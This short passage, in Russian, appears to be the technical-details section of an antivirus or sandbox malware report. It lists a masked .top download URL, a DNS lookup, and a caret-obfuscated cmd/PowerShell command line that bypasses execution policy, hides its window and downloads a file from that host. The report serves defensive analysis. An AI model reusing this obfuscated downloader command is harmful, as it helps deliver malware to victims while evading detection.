Техническая информация
- http://tr####oreyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwERsHe^L^L.eXE ^-eXEC^u^t^I^Onpo^LIcY^ ^By^P^a^Ss ^-NOpro^FI^lE^ -^WiN^d^ow^S^TYL^e^ hi^dDen (n^Ew^-oBJect^ s^ys^TeM^.Net.WeB^cL^Ien^T)^.dOwNL^O^A^d^fILe(^'http://tr####ore...
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /c "pOwERsHe^L^L.eXE ^-eXEC^u^t^I^Onpo^LIcY^ ^By^P^a^Ss ^-NOpro^FI^lE^ -^WiN^d^ow^S^TYL^e^ hi^dDen (n^Ew^-oBJect^ s^ys^TeM^.Net.WeB^cL^Ien^T)^.dOwNL^O^A^d^fILe(^'http://tr####ore...' (со скрытым окном)